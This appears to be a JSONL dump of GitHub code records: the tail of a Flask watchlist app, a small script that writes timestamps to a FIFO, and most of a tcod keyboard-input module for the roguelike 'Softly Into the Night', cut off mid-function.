type(json_data['watchlist_uuid']) != str:\n return redirect(url_for('index'))\n\n # if the watchlist_uuid is empty\n if len(json_data['watchlist_uuid']) == 0:\n return redirect(url_for('index'))\n\n watchlist_uuid: str = json_data['watchlist_uuid']\n\n valid_display_name: bool = True\n\n # if the watchlist_display_name is not in the JSON payload\n if 'watchlist_display_name' not in json_data:\n valid_display_name = False\n\n # if the watchlist_display_name is not a string\n if type(json_data['watchlist_display_name']) != str:\n valid_display_name = False\n\n # if the watchlist_display_name is empty\n if len(json_data['watchlist_display_name']) == 0:\n valid_display_name = False\n\n watchlist_display_name: str = \"My Watchlist\"\n\n if valid_display_name:\n watchlist_display_name: str = json_data['watchlist_display_name']\n\n episode_watch_states: list[EpisodeWatchState] = []\n\n # loop through episode_watch_states attribute in the JSON payload\n for episode_watch_state in json_data['episode_watch_states']:\n state = EpisodeWatchState(\n episode_id=episode_watch_state['episode_id'],\n watched=episode_watch_state['watched']\n )\n episode_watch_states.append(state)\n\n add_episodes(watchlist_uuid, watchlist_display_name, episode_watch_states)\n\n return redirect(url_for('index'))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"jonesjacklewis/FlaskArrowverse","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39561417032","text":"import os, time, sys\nfrom datetime import datetime\n\nnombre_fifo = '/tmp/ped1_group1Date'\n\nif not os.path.exists(nombre_fifo):\n os.mkfifo(nombre_fifo)\n\nfifo_escritura = os.open(nombre_fifo, os.O_WRONLY)\nwhile True:\n hora = datetime.now()\n mensaje = hora.strftime(\"%d/%m/%Y %H:%M:%S\\n\")\n os.write(fifo_escritura, mensaje.encode('utf8'))\n time.sleep(1)\n\n","repo_name":"kike454/examenPED","sub_path":"practicasVerdaderas/p3Enrique/p3/serv.py","file_name":"serv.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37063854249","text":"'''\r\n orangIO\r\n (Orange I/O)\r\n An input/output extension for tcod Python\r\n \r\n Softly Into the Night, a sci-fi/Lovecraftian roguelike\r\n Copyright (C) 2020 Jacob Wharton.\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see \r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n Alpha: This module is currently in Alpha mode\r\n It is usable but not very user-friendly,\r\n and has a lot of dependencies.\r\n\r\n This extension to tcod allows you to easily do:\r\n - key commands with any combination of Shift, Ctrl, and Alt\r\n - text input with blinking cursor\r\n - \"waiting\" for a certain input\r\n\r\n How to use this module:\r\n\r\n Call init_keyBindings during the initialization of your game.\r\n Use the key_get* wrapper functions to interface with the keyboard input.\r\n The handle_mousekeys function is the function that allows commands\r\n with any combination of Ctrl, Shift and Alt.\r\n - To use this function in your game,\r\n modify COMMANDS and key_bindings.txt defaults.\r\n Call the get_raw_input wrapper function to\r\n wrap the tcod key and mouse objects in a tuple.\r\n key_bindings.txt\r\n To edit key bindings, refer to the comments on key_bindings.txt\r\n To change the directory of key_bindings.txt, change the variable\r\n \"file_keyBindings\"\r\n\r\n Example use for key combo inputs:\r\n \r\n # get input #\r\n pcInput=IO.get_raw_input()\r\n pcAct=IO.handle_mousekeys(pcInput).items()\r\n \r\n # process commands #\r\n for act,arg in pcAct:\r\n if act == \"lclick\":\r\n mousex,mousey,z = arg #unpack command arguments\r\n #...\r\n if act == \"move\":\r\n dx,dy,dz = arg #unpack command arguments\r\n #...\r\n \r\n \r\n'''\r\n\r\n\r\nimport os\r\nimport tcod\r\nimport time\r\nimport textwrap\r\n\r\nfrom const import *\r\nimport managers \r\nimport maths\r\nimport word\r\n\r\n\r\n\r\n #colors\r\nWHITE=tcod.Color(255,255,255)\r\nBLACK=tcod.Color(0,0,0)\r\n\r\n #global key and mouse handlers for all objects in OrangIO\r\nkey = tcod.Key()\r\nmouse = tcod.Mouse()\r\n\r\n#this value is the number of alternate key codes for each command.\r\n #the number of key codes for each command in key_bindings.txt\r\n #MUST MATCH THIS VALUE.\r\nNUM_ALT_CMDS = 3\r\n\r\n\r\n#directory of \"key_bindings.txt\"\r\nfile_keyBindings=os.path.join(\r\n os.path.curdir,os.path.pardir,\"settings\",\"key_bindings.txt\")\r\n\r\n'''###\r\n#key_bindings.txt\r\n #This is the backup key bindings file\r\n\r\n #To add a new command into the game, add it into the key_bindings.txt\r\n #defaults below. Add Shift+ or Ctrl+ or Alt+ or any combo thereof.\r\n #Delete the key_bindings.txt file from the game's directory to\r\n #have the game recreate it using the defaults.\r\n # - Do not use spaces.\r\n # - To use special keys, including spacebar:\r\n refer to the TEXT_TO_KEY dict.\r\n # - Take note of the placement you put the command into the text file.\r\n #Put that command into the dict COMMANDS in the SAME ORDER that you put\r\n #it into key_bindings.\r\n # - Put the command into player.commands or player.const_commands.\r\n # (If using this as a third party module, simply run\r\n # handle_mousekeys and check that the result == the desired command)\r\n \r\n#if you add new commands you must add new key bindings for those commands.\r\n#key bindings begin on a new line,\r\n #and consist of any combination of the following:\r\n #Ctrl+\r\n #Shift+\r\n #Alt+\r\n #followed by a key constant as defined in TEXT_TO_KEY\r\n #or a letter/number/symbol on the keyboard.\r\n #ALERT: To get the ? key:\r\n #do the key combination Shift+/ instead of ?\r\n #IN GENERAL, only use the lowercase keys and indicate Shift+\r\n #in order to indicate that the uppercase character should be used.\r\n #Example: to make a command respond to the command \">\",\r\n #the command must be written as Shift+.\r\n #(shift+ period key)\r\n #Note: NumPad is not currently supported. NumPad must be OFF during play.\r\n #Note: commands are not case-sensitive.\r\n###'''\r\n\r\nKEYBINDINGS_TEXT_DEFAULT = '''//file name: {filename}\r\n\r\n//These are comments.\r\n// All empty lines, and all lines beginning with \"//\"\r\n// (without quotations), are considered to be comments\r\n// by the file reader, and are ignored.\r\n\r\n// --- Key Bindings Information ---\r\n\r\n//In order to remove one binding, set it to: NONE \r\n//Bindings may begin with any combination of shift, ctrl,\r\n// and alt, followed by a plus (+) symbol:\r\n// \"Shift+\" OR \"Ctrl+\" OR \"Alt+\"\r\n//Keypad numbers begin with \"KP\" e.g. \"KP5\"\r\n\r\n//Example key bindings\r\n// (note bindings are case-insensitive):\r\n// CTRL+ALT+DELETE\r\n// shift+=\r\n// f\r\n// Ctrl+A\r\n// none\r\n// None\r\n// KP8\r\n\r\n//The action bound to the last combo will function if and\r\n// only if the a button is pressed WHILE the Ctrl button\r\n// is being held, and neither Alt nor Shift are also being\r\n// pressed down; if the Alt button is also being held, for\r\n// instance, the input will be treated as \"Ctrl+Alt+a\",\r\n// which is different from \"Ctrl+a\".\r\n\r\n//Note:\r\n// Left and right Ctrl are treated as the same.\r\n// Left and right Alt are treated as the same.\r\n// Left and right Shift are treated as the same.\r\n\r\n//ALERT: NumLock is currently unsupported.\r\n// The numpad keys might not work as expected with NumLock on.\r\n// Keep NumLock off during play.\r\n\r\n//---------\\\\\r\n// Bindings |\r\n//---------//\r\n\r\n// display commands / help\r\nShift+/\r\nNONE\r\nNONE\r\n\r\n// North\r\nK\r\nKP8\r\nNONE\r\n\r\n// West\r\nH\r\nKP4\r\nNONE\r\n\r\n// South\r\nJ\r\nKP2\r\nNONE\r\n\r\n// East\r\nL\r\nKP6\r\nNONE\r\n\r\n// Northwest\r\nY\r\nKP7\r\nNONE\r\n\r\n// Southwest\r\nB\r\nKP1\r\nNONE\r\n\r\n// Southeast\r\nN\r\nKP3\r\nNONE\r\n\r\n// Northeast\r\nU\r\nKP9\r\nNONE\r\n\r\n// Direct Towards Self\r\n.\r\nKP5\r\nNONE\r\n\r\n// up\r\nShift+,\r\nNONE\r\nNONE\r\n\r\n// down\r\nShift+.\r\nNONE\r\nNONE\r\n\r\n// context-sensitive action\r\nSPACE\r\nNONE\r\nNONE\r\n\r\n// chat | talk | speak\r\nc\r\nNONE\r\nNONE\r\n\r\n// target entity (+ target limbs) to fire / throw / attack\r\nt\r\nNONE\r\nNONE\r\n\r\n// move prompt\r\nm\r\nNONE\r\nNONE\r\n\r\n// attack prompt\r\nx\r\nNONE\r\nNONE\r\n\r\n// shoot ranged weapon\r\nf\r\nNONE\r\nNONE\r\n\r\n// throw missile\r\nshift+t\r\nNONE\r\nNONE\r\n\r\n// get item (pickup & place in inventory)\r\ng\r\n,\r\nNONE\r\n\r\n// grab item (pickup item & hold in hand)\r\nctrl+,\r\nNONE\r\nNONE\r\n\r\n// grapple (grab foe's limbs, etc.)\r\nctrl+g\r\nNONE\r\nNONE\r\n\r\n// open/Close\r\no\r\nNONE\r\nNONE\r\n\r\n// close\r\nShift+=\r\nNONE\r\nNONE\r\n\r\n// open\r\n-\r\nNONE\r\nNONE\r\n\r\n// inventory\r\ni\r\nNONE\r\nNONE\r\n\r\n// abilities menu\r\nTab\r\nNONE\r\nNONE\r\n\r\n// equipment menu\r\ne\r\nNONE\r\nNONE\r\n\r\n// change body position or stance (crouch, stand, lie prone, etc.)\r\np\r\nNONE\r\nNONE\r\n\r\n// change movement speed (walking, running, sprinting, etc.)\r\ns\r\nNONE\r\nNONE\r\n\r\n// speed up movement speed\r\nShift+s\r\nNONE\r\nNONE\r\n\r\n// slow down movement speed\r\nCtrl+s\r\nNONE\r\nNONE\r\n\r\n// examine or Look\r\n/\r\nShift+L\r\nNONE\r\n\r\n// wait\r\nw\r\nCtrl+t\r\nNONE\r\n\r\n// rest\r\nr\r\nNONE\r\nNONE\r\n\r\n// move view\r\nv\r\nNONE\r\nNONE\r\n\r\n// fixed view mode\r\nCtrl+v\r\nNONE\r\nNONE\r\n\r\n// show player location (find player)\r\nCtrl+f\r\nNONE\r\nNONE\r\n\r\n// show message history\r\nShift+h\r\nNONE\r\nNONE\r\n\r\n// show character page\r\na\r\nShift+c\r\nNONE\r\n\r\n// quit game\r\nAlt+q\r\nNONE\r\nNONE\r\n\r\n//---------\\\\\r\n// MENUS |\r\n//---------//\r\n\r\n// Menu Up\r\nUP\r\nNONE\r\nNONE\r\n\r\n// Menu Left\r\nLEFT\r\nNONE\r\nNONE\r\n\r\n// Menu Down\r\nDOWN\r\nNONE\r\nNONE\r\n\r\n// Menu Right\r\nRIGHT\r\nNONE\r\nNONE\r\n\r\n// Select\r\nSPACE\r\nENTER\r\nNONE\r\n\r\n// Exit\r\nESCAPE\r\nNONE\r\nNONE\r\n\r\n// Page Up\r\nPAGEUP\r\nNONE\r\nNONE\r\n\r\n// Page Down\r\nPAGEDOWN\r\nNONE\r\nNONE\r\n\r\n// Home\r\nHOME\r\nNONE\r\nNONE\r\n\r\n// End\r\nEND\r\nNONE\r\nNONE\r\n\r\n// Delete\r\nDELETE\r\nNONE\r\nNONE\r\n\r\n// Insert\r\nINSERT\r\nNONE\r\nNONE\r\n\r\n// Backspace\r\nBACKSPACE\r\nNONE\r\nNONE\r\n\r\n//---------\\\\\r\n// ADVANCED |\r\n//---------//\r\n\r\n// Shell / command prompt / console\r\nCtrl+`\r\nNONE\r\nNONE\r\n\r\n// Execute last console command (during play)\r\nCtrl+Shift+`\r\nNONE\r\nNONE\r\n\r\n// \r\n\r\n//\r\n'''.format(filename=file_keyBindings)\r\n\r\n'''\r\n# IMPORTANT!!\r\n# Order of commands must match order in the key_bindings.txt file. #\r\n'''\r\nCOMMANDS = { # translate commands into actions\r\n\r\n 'help' : {'help': True}, # CHANGED ORDERING, TEST TO MAKE SURE IT STILL WORKS.\r\n 'north' : {'context-dir': (0, -1, 0,) },\r\n 'west' : {'context-dir': (-1, 0, 0,) },\r\n 'south' : {'context-dir': (0, 1, 0,) },\r\n 'east' : {'context-dir': (1, 0, 0,) },\r\n 'northwest' : {'context-dir': (-1, -1, 0,) },\r\n 'southwest' : {'context-dir': (-1, 1, 0,) },\r\n 'southeast' : {'context-dir': (1, 1, 0,) },\r\n 'northeast' : {'context-dir': (1, -1, 0,) },\r\n 'self' : {'context-dir': (0, 0, 0,) },\r\n 'up' : {'context-dir': (0, 0, -1,) },\r\n 'down' : {'context-dir': (0, 0, 1,) },\r\n 'context' : {'context': True},\r\n 'chat-context' : {'chat-context': True},\r\n 'target-prompt' : {'target-prompt': True},\r\n 'move-prompt' : {'move-prompt': True},\r\n 'attack-prompt' : {'attack-prompt': True},\r\n 'shoot-prompt' : {'shoot-prompt': True},\r\n 'throw-prompt' : {'throw-prompt': True},\r\n 'get-prompt' : {'get-prompt': True},\r\n 'grabitem-prompt':{'grabitem-prompt': True},\r\n 'grapple-prompt': {'grapple-prompt': True},\r\n 'openclose-prompt':{'openclose-prompt': True},\r\n 'close-prompt' : {'close-prompt': True},\r\n 'open-prompt' : {'open-prompt': True},\r\n 'inventory' : {'inventory': True},\r\n 'abilities' : {'abilities': True},\r\n 'equipment' : {'equipment': True},\r\n 'change-pos' : {'change-pos': True},\r\n 'change-msp' : {'change-msp': True},\r\n 'msp-up' : {'msp-up': True},\r\n 'msp-down' : {'msp-down': True},\r\n 'look' : {'look': True},\r\n 'wait' : {'wait': True},\r\n 'rest' : {'rest': True},\r\n 'move view' : {'move view': True},\r\n 'fixed view' : {'fixed view': True},\r\n 'find player' : {'find player': True},\r\n 'msg history' : {'message history': True},\r\n 'char page' : {'character page': True},\r\n 'quit' : {'quit game': True},\r\n\r\n 'menu-up' : {'menu-nav': (0, -1, 0,) },\r\n 'menu-left' : {'menu-nav': (-1, 0, 0,) },\r\n 'menu-down' : {'menu-nav': (0, 1, 0,) },\r\n 'menu-right' : {'menu-nav': (1, 0, 0,) },\r\n 'select' : {'select': True},\r\n 'exit' : {'exit': True},\r\n 'pgup' : {'page up': True},\r\n 'pgdn' : {'page down': True},\r\n 'home' : {'home': True},\r\n 'end' : {'end': True},\r\n 'delete' : {'delete': True},\r\n 'insert' : {'insert': True},\r\n 'backspace' : {'backspace': True},\r\n \r\n 'console' : {'console': True},\r\n 'last cmd' : {'last cmd': True},\r\n}\r\n\r\n#-----------------------------------------------------------#\r\nTEXT_TO_KEY = { # translate text into key constants\r\n 'none' : -1,\r\n 'kp0' : tcod.KEY_KP0,\r\n 'kp1' : tcod.KEY_KP1,\r\n 'kp2' : tcod.KEY_KP2,\r\n 'kp3' : tcod.KEY_KP3,\r\n 'kp4' : tcod.KEY_KP4,\r\n 'k5p' : tcod.KEY_KP5,\r\n 'kp6' : tcod.KEY_KP6,\r\n 'kp7' : tcod.KEY_KP7,\r\n 'kp8' : tcod.KEY_KP8,\r\n 'kp9' : tcod.KEY_KP9,\r\n 'up' : tcod.KEY_UP,\r\n 'down' : tcod.KEY_DOWN,\r\n 'right' : tcod.KEY_RIGHT,\r\n 'left' : tcod.KEY_LEFT,\r\n 'space' : tcod.KEY_SPACE,\r\n 'tab' : tcod.KEY_TAB,\r\n 'enter' : tcod.KEY_ENTER,\r\n 'escape' : tcod.KEY_ESCAPE,\r\n 'backspace' : tcod.KEY_BACKSPACE,\r\n 'insert' : tcod.KEY_INSERT,\r\n 'delete' : tcod.KEY_DELETE,\r\n 'home' : tcod.KEY_HOME,\r\n 'end' : tcod.KEY_END,\r\n 'pagedown' : tcod.KEY_PAGEDOWN,\r\n 'pageup' : tcod.KEY_PAGEUP,\r\n 'f1' : tcod.KEY_F1,\r\n 'f2' : tcod.KEY_F2,\r\n 'f3' : tcod.KEY_F3,\r\n 'f4' : tcod.KEY_F4,\r\n 'f5' : tcod.KEY_F5,\r\n 'f6' : tcod.KEY_F6,\r\n 'f7' : tcod.KEY_F7,\r\n 'f8' : tcod.KEY_F8,\r\n 'f9' : tcod.KEY_F9,\r\n 'f10' : tcod.KEY_F10,\r\n 'f11' : tcod.KEY_F11,\r\n 'f12' : tcod.KEY_F12,\r\n}\r\nVK_TO_CHAR = { # translate key consants into a char\r\n tcod.KEY_KP0 : '0',\r\n tcod.KEY_KP1 : '1',\r\n tcod.KEY_KP2 : '2',\r\n tcod.KEY_KP3 : '3',\r\n tcod.KEY_KP4 : '4',\r\n tcod.KEY_KP5 : '5',\r\n tcod.KEY_KP6 : '6',\r\n tcod.KEY_KP7 : '7',\r\n tcod.KEY_KP8 : '8',\r\n tcod.KEY_KP9 : '9',\r\n tcod.KEY_KPDEC : '.',\r\n \r\n tcod.KEY_UP : chr(K_UP),\r\n tcod.KEY_DOWN : chr(K_DOWN),\r\n tcod.KEY_RIGHT : chr(K_RIGHT),\r\n tcod.KEY_LEFT : chr(K_LEFT),\r\n tcod.KEY_BACKSPACE : chr(K_BACKSPACE),\r\n tcod.KEY_DELETE : chr(K_DELETE),\r\n tcod.KEY_INSERT : chr(K_INSERT),\r\n tcod.KEY_PAGEUP : chr(K_PAGEUP),\r\n tcod.KEY_PAGEDOWN : chr(K_PAGEDOWN),\r\n tcod.KEY_HOME : chr(K_HOME),\r\n tcod.KEY_END : chr(K_END),\r\n tcod.KEY_ENTER : chr(K_ENTER),\r\n tcod.KEY_KPENTER : chr(K_ENTER),\r\n tcod.KEY_ESCAPE : chr(K_ESCAPE),\r\n}\r\n\r\n\r\n\r\n\r\n\r\n#-----------#\r\n# classes #\r\n#-----------#\r\n\r\n\r\n#\r\n# cursor\r\n#\r\n \r\nclass Cursor:\r\n \r\n def __init__(self,x=0,y=0,rate=0.3):\r\n self.set_pos(x,y)\r\n self.time_stamp = 0\r\n self.blink_time = rate\r\n \r\n def set_pos(self,x,y): self._x = x; self._y = y;\r\n def draw(self,con=0): console_invert_color(con,self.x,self.y)\r\n \r\n def blink(self):\r\n if time.time() - self.time_stamp > self.blink_time:\r\n self.blink_reset_timer_off()\r\n return True\r\n else: return False\r\n \r\n def blink_reset_timer_off(self):\r\n self.time_stamp = time.time()\r\n def blink_reset_timer_on(self):\r\n self.time_stamp = 0\r\n \r\n @property\r\n def x(self): return self._x\r\n @property\r\n def y(self): return self._y\r\n\r\n\r\n#\r\n# Text Input Manager\r\n#\r\n#\r\n\r\n# Display user-entered text field with blinking cursor\r\n# and handle all processes thereof.\r\n\r\n# key bindings should NEVER affect input for this function.\r\n# that got nasty real fast in Caves of Qud...\r\n\r\n#---------------Args----------------#\r\n# int x,y location on screen\r\n# int w,h width and height of textbox\r\n# string default text that appears when textbox is created\r\n# string mode 'text' or 'wait' :\r\n# - text mode: normal input mode, returns text when Enter key pressed\r\n# - wait mode: returns first accepted key press input\r\n# bool insert begin in \"insert\" mode?\r\n#\r\n\r\nclass TextInputManager(managers.Manager): #Manager_Input | ManagerInput\r\n \r\n def __init__(self, x,y, w,h, default,mode,insert):\r\n \r\n # init\r\n self.console = tcod.console_new(w, h)\r\n self.init_time = time.time()\r\n \r\n self.x=x\r\n self.w=w\r\n self.y=y\r\n self.h=h\r\n self.mode=mode\r\n self.text=\"\" if mode==\"wait\" else default\r\n self.default=default\r\n \r\n self.keyInput=''\r\n \r\n self.redraw_cursor = True\r\n self.render_text = True\r\n self.flush = False\r\n \r\n self.key=key\r\n self.mouse=mouse\r\n \r\n self.cursor=Cursor()\r\n self.cursor.set_pos(x,y)\r\n self.insert_mode=insert #replace the character under the cursor or shift it aside?\r\n \r\n #ignore buffer\r\n get_raw_input()\r\n\r\n\r\n def set_result(self,val):\r\n if val == '': val=self.default\r\n if val == '': val='0'\r\n elif val == '\\x1c': val='0'\r\n super(TextInputManager,self).set_result(val)\r\n \r\n def run(self):\r\n super(TextInputManager, self).run()\r\n \r\n## # manually close game #\r\n## if libtcod.console_is_window_closed():\r\n## #sys.exit() # no, there should be a custom exit func\r\n \r\n tcod.sys_sleep_milli(5) #reduce CPU usage\r\n \r\n self.update()\r\n \r\n tcod.sys_check_for_event( # check don't wait.\r\n tcod.EVENT_KEY\r\n | tcod.EVENT_MOUSE_PRESS # we only want to know mouse press\r\n | tcod.EVENT_MOUSE_RELEASE, # or release, NOT mouse move event.\r\n self.key, self.mouse)\r\n \r\n self.get_char()\r\n self.mouse_events()\r\n self.keyboard_events()\r\n \r\n def close(self):\r\n ##do not inherit\r\n tcod.console_delete(self.console)\r\n \r\n def update(self):\r\n \r\n self.flush=False\r\n \r\n if self.cursor.blink():\r\n self.redraw_cursor=True\r\n \r\n if self.render_text:\r\n self.update_render_text()\r\n self.redraw_cursor=True\r\n \r\n if self.redraw_cursor:\r\n self.cursor.draw()\r\n self.flush=True\r\n \r\n if self.flush:\r\n tcod.console_flush()\r\n\r\n #now we've updated, turn all update variables to False\r\n self.redraw_cursor =False\r\n self.render_text =False\r\n self.flush =False\r\n\r\n def keyboard_events(self):\r\n \r\n if self.keyInput:\r\n\r\n if self.mode == \"wait\": # CHANGED. Was just self.set_result(self.keyInput). Test that all Input() uses are still working properly using \"wait\" mode.\r\n if (ord(self.keyInput) == K_ESCAPE):\r\n self.set_result(self.default)\r\n else:\r\n self.set_result(self.keyInput)\r\n\r\n self.redraw_cursor=True\r\n self.cursor_blinkOn()\r\n\r\n if self.mode == \"text\":\r\n self.input_vk()\r\n self.input_text()\r\n\r\n def mouse_events(self):\r\n \r\n if self.mouse.lbutton_pressed:\r\n self.cursor_blinkOn()\r\n self.putCursor(self.mouse.cx - self.x)\r\n self.blit_console()\r\n self.flush=True\r\n\r\n\r\n def input_vk(self):\r\n \r\n if not tcod.console_is_key_pressed(self.key.vk):\r\n return\r\n\r\n cpos=self.cursor_pos\r\n ans=ord(self.keyInput)\r\n\r\n # returning a result\r\n if (ans == K_ENTER): self.set_result(self.text)\r\n if (ans == K_ESCAPE): self.set_result(self.default)\r\n\r\n # deleting\r\n if (ans == K_BACKSPACE) :\r\n self.render_text=True\r\n self.putCursor(cpos - 1)\r\n self.delete()\r\n elif (ans == K_DELETE) :\r\n self.render_text=True\r\n self.delete()\r\n # moving\r\n elif (ans == K_LEFT) : self.move(cpos - 1)\r\n elif (ans == K_RIGHT) : self.move(cpos + 1)\r\n \r\n # insert mode\r\n elif (ans == K_INSERT) : self.insert_mode = not self.insert_mode\r\n\r\n\r\n def input_text(self):\r\n\r\n if not self.key.vk == tcod.KEY_TEXT:\r\n return\r\n \r\n ans=self.keyInput\r\n if self.cursor_pos < len(self.text): # insert or replace\r\n self.render_text=True\r\n first_half = self.text[:self.cursor_pos]\r\n second_half = self.text[self.insert_mode + self.cursor_pos:]\r\n self.text='{}{}{}'.format(first_half, ans, second_half)\r\n else: # append\r\n self.text += ans\r\n self.put_next_char(ans)\r\n self.blit_console()\r\n self.flush=True\r\n\r\n # truncate\r\n if (len(self.text) > self.w):\r\n self.text = self.text[:self.w]\r\n \r\n # move cursor\r\n self.putCursor(self.cursor_pos + 1)\r\n #\r\n\r\n\r\n def move(self, new):\r\n tcod.console_set_char_foreground(\r\n 0, self.x + self.cursor_pos, self.y, WHITE)\r\n tcod.console_set_char_background(\r\n 0, self.x + self.cursor_pos, self.y, BLACK)\r\n self.flush=True\r\n self.putCursor(new)\r\n\r\n def update_render_text(self):\r\n tcod.console_clear(self.console)\r\n tcod.console_print_ex(\r\n self.console,0,0,\r\n tcod.BKGND_NONE,tcod.LEFT,\r\n self.text )\r\n self.blit_console()\r\n \r\n def get_char(self):\r\n reply=''\r\n if tcod.console_is_key_pressed(self.key.vk):\r\n reply = VK_TO_CHAR.get(self.key.vk, None)\r\n \r\n elif self.key.vk == tcod.KEY_TEXT:\r\n tx = self.key.text #.decode()\r\n if (ord(tx) >= 128 or tx == '%'):\r\n return '' # Prevent problem-causing input\r\n else: reply=tx\r\n self.keyInput=reply\r\n\r\n def delete(self):\r\n self.text=self.text[:self.cursor_pos] + self.text[1+self.cursor_pos:]\r\n \r\n def put_next_char(self,new):\r\n tcod.console_put_char_ex(\r\n self.console, self.cursor_pos,0, new,\r\n WHITE,BLACK\r\n )\r\n def blit_console(self):\r\n tcod.console_blit(\r\n self.console, 0,0,self.w,self.h,\r\n 0, self.x,self.y\r\n ) \r\n '''def ignore_buffer(self):\r\n return (time.time() - self.init_time < .05)'''\r\n def putCursor(self,new):\r\n pos=maths.restrict( new, 0, min(self.w - 1, len(self.text)) )\r\n self.cursor.set_pos(self.x + pos, self.y)\r\n def cursor_blinkOn(self): self.cursor.blink_reset_timer_on()\r\n \r\n @property\r\n def cursor_pos(self): return self.cursor.x\r\n\r\n\r\n#--------------------------------------------------#\r\n\r\n\r\n\r\n\r\n#-----------#\r\n# functions #\r\n#-----------#\r\n\r\n# help page\r\ndef render_help() -> str: # may not display all commands\r\n return ''' ~~~~~ Help / Command List ~~~~~\r\n\r\nCommand =================== Default Key Combo\r\n\r\n ~~~~~ Global commands ~~~~~\r\nshow this help page ======= Shift+/\r\n\r\n ~~~~~ Movement controls ~~~~~\r\n# Default movement controls use vim keys or keypad numbers\r\n\r\nnorth ===================== k -or- keypad 8\r\nwest ====================== h -or- keypad 4\r\nsouth ===================== j -or- keypad 2\r\neast ====================== l -or- keypad 6\r\nnorthwest ================= y -or- keypad 7\r\nsouthwest ================= b -or- keypad 1\r\nsoutheast ================= n -or- keypad 3\r\nnortheast ================= u -or- keypad 9\r\ntowards self ============== . -or- keypad 5\r\nup ======================== Shift+,\r\ndown ====================== Shift+.\r\n\r\n ~~~~~ Basic controls ~~~~~\r\nperform action ============ Space\r\n\r\n ~~~~~ Movement controls ~~~~~\r\n\r\n'''\r\n\r\n\r\n#key functions\r\ndef key_getchar(k):\r\n '''\r\n # we add 256 here to differentiate character (text) codes from\r\n # special key codes, like NumLock, which happens to have the same\r\n # integer code (62) as > (greater than symbol), for example.\r\n '''\r\n return k + 256\r\ndef key_get_pressed(): # get both vk and text in one variable\r\n k = tcod.KEY_NONE\r\n if tcod.console_is_key_pressed(key.vk) : k = key.vk \r\n if k == tcod.KEY_CHAR : k = key_getchar(key.c)\r\n return k\r\ndef key_get_special_combo(k): # combine shift,ctrl,alt, and key press\r\n shift = key.shift\r\n ctrl = (key.lctrl or key.rctrl)\r\n alt = (key.lalt or key.ralt )\r\n return (k, (shift, ctrl, alt,),)\r\n\r\n# files #\r\n\r\n#is line a \"comment\"? Return whether string line should be ignored.\r\ndef file_is_line_comment(line):\r\n return ((line[0]=='/' and line[1]=='/') or line[0]=='\\n')\r\n\r\n# tcod #\r\n\r\ndef color_invert(rgb):\r\n return tcod.Color(255-rgb[0],255-rgb[1],255-rgb[2])\r\ndef console_invert_color(con,x,y):\r\n col1 = tcod.console_get_char_foreground(con,x,y)\r\n col2 = tcod.console_get_char_background(con,x,y)\r\n tcod.console_set_char_foreground(con, x,y, color_invert(col1))\r\n tcod.console_set_char_background(con, x,y, color_invert(col2))\r\n\r\n#\r\n#\r\n# get raw input\r\n#\r\n# checks for input\r\n# returns key and mouse objects in a tuple\r\n#\r\ndef get_raw_input():\r\n tcod.sys_sleep_milli(1) # prevent from checking a billion times/second to reduce CPU usage\r\n\r\n # we use the check_for_event instead of the wait_for_event function\r\n # because wait_for_event causes lots of problems\r\n tcod.sys_check_for_event(\r\n tcod.EVENT_KEY\r\n | tcod.EVENT_MOUSE_PRESS # we only want to know mouse press\r\n | tcod.EVENT_MOUSE_RELEASE, # or release, NOT mouse move event.\r\n key, mouse)\r\n return (key,mouse,)\r\n#\r\n#\r\n# handle_mousekeys\r\n#\r\n# convert keyboard and mouse input into player commands\r\n# and return the command as a dict\r\n#\r\ndef handle_mousekeys(keymouse):\r\n key,mouse=keymouse\r\n \r\n # Mouse #\r\n\r\n if mouse.lbutton_pressed: return {'lclick': (mouse.cx,mouse.cy,0,) }\r\n if mouse.rbutton_pressed: return {'rclick': (mouse.cx,mouse.cy,0,) }\r\n \r\n # Keys #\r\n \r\n k = key_get_pressed()\r\n combined = key_get_special_combo(k)\r\n \r\n return COMMANDS.get(bind.get(combined, None), {})\r\n\r\n#Input\r\n#wrapper function to get a simple input from the user\r\ndef Input(x,y, w=1,h=1, default='',mode='text',insert=False):\r\n manager=TextInputManager(x,y, w,h, default,mode,insert)\r\n result=None\r\n while not result:\r\n manager.run()\r\n result=manager.result\r\n manager.close()\r\n return result\r\n\r\n#\r\n# key bindings\r\n#\r\n\r\nbind={}\r\nNO_KEY=(-1,(False,False,False,),) # NULL key constant\r\n\r\n# init_keyBindings\r\n# call during setup to initialize the keyboard controls\r\ndef init_keyBindings():\r\n try:\r\n _init_keyBindings()\r\n except FileNotFoundError:\r\n print(\"'key_bindings.txt' file not found. Creating new file from defaults...\")\r\n _keyBindings_writeFromDefault()\r\n _init_keyBindings()\r\n\r\n#\r\n# *DO NOT CALL THIS FUNCTION*\r\n# call init_keyBindings instead\r\n# _init_keyBindings\r\n# read from a file and put key binding info into dict bind.\r\n#\r\ndef _init_keyBindings():\r\n \r\n global bind\r\n\r\n codes = [] # list of key codes 0-511 (0-255 and an additional 256\r\n # for special key inputs like NumPad digits)\r\n combin = [] # list of tuples (shift,ctrl,alt) for key combinations\r\n \r\n numCommands=0 #counter\r\n \r\n with open(file_keyBindings, 'r') as bindings:\r\n for line in bindings:\r\n if file_is_line_comment(line): continue #ignore comments\r\n\r\n #read this line as a command\r\n numCommands += 1\r\n \r\n #init\r\n line=word.remove_blankspace(line) #ignore white space\r\n line=line.lower() #not case-sensitive\r\n \r\n #NONE\r\n if \"none\" in line: #no key set, still need to put something in the list\r\n combin.append( (False,False,False,) )\r\n codes.append( -1 ) # NULL key\r\n continue\r\n \r\n # Key combinations #\r\n \r\n delete=0\r\n if 'shift+' in line:\r\n delete+=6\r\n _shf = True\r\n else: _shf = 